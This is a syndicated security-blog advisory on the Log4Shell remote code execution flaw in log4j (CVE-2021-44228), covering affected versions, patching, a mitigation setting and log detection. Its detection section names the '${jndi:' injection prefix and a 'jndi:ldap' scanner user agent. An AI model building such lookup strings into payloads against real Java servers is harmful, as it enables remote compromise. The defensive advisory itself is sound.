Hot Topics
Security Bloggers Network 
SBN

Security Advisory Regarding Log4Shell

by Dusty Miller on December 10, 2021

Summary

On December 9, there was a Remote Code Execution (RCE) discovered in the Java logging library log4j given CVE-2021-44228. The RCE is triggered by Java-based applications logging the exploit string and executing a remote payload that the string is pointing to. This vulnerability leaves any server hosting an unpatched java application vulnerable to exploitation.

Log4j2 released version 2.15.0 on Dec 09, 2021 to fix the vulnerability.

Details

The vulnerability affects Log4j versions 1.0 to 2.14.1. If you are running any Java application that uses the affected log4j libraries and that accepts and logs user input, make a significant effort to patch the update. For enterprise customers, this means Java-based web applications, and perhaps even network or security appliances that integrate Java as a part of their operations. Java’s famous tagline is that it runs on billions of devices. Apache Struts appears to be affected, but some versions of the JDK were not affected as they were secured. 

Lunasec has a more detailed write up on the vulnerability and exploit.

Please note that log4j 2.12.1 was the last release of log4j that supported Java 7 and that patching this vulnerability may require updating the JVM to Java 8. 

Mitigations

Log4j2 versions 2.10.0 and greater have a formatMsgNoLookups property which will mitigate the vulnerability if enabled. If this setting does not break anything in your application, it is recommended to enable it.

Detection

To detect exploit attempts, look for the string “${jndi:” in web logs. If you find any results, there should also be a payload following the string. If there is allowed traffic to the payload, make sure to fully investigate the server to determine what executed.

GreyNoise has added a tag to their service to find web scanners scanning for the vulnerability:

Web Scanners scanning with the user agent “jndi:ldap”

Web Scanners tagged with log4j

Additional Resources

Proof of concept exploits for this vulnerability as well as detailed write-ups are currently available below:

The post Security Advisory Regarding Log4Shell appeared first on Hurricane Labs.

*** This is a Security Bloggers Network syndicated blog from Hurricane Labs authored by Dusty Miller. Read the original post at: https://hurricanelabs.com/security-advisory/security-advisory-regarding-log4shell/?utm_source=rss&utm_medium=rss&utm_campaign=security-advisory-regarding-log4shell

Dusty Miller

Secure Guardrails